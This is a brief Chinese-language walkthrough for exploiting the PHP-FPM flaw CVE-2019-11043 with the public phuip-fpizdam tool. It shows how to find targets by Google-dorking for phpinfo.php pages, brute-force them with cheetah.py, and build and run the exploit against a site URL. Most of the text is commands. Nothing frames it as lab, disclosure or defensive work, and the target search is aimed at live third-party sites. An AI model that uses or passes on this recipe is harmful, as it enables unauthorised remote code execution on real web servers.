phuip-fpizdam php5版本漏洞利用和复现php-fpm (CVE-2019-11043)
https://github.com/lvwuwei/phuip-fpizdam
可使用 cheetah暴力
python cheetah.py -u http://xxxx.com/phpinfo.php
使用google dork浏览器搜索inurl="phpinfo.php"
返回php5版本网站
使用go语言 下载最新版https://golang.org/dl/
wget https://golang.org/dl/go1.16.2.linux-amd64.tar.gz tar xvf go1.16.2.linux-amd64.tar.gz mv go /usr/local export PATH=$PATH:/usr/local/go/bin
然后
git clone https://github.com/lvwuwei/phuip-fpizdam
cd /phuip-fpizdam
go build
./phuip-fpizdam http://xxxx.com/xxx.php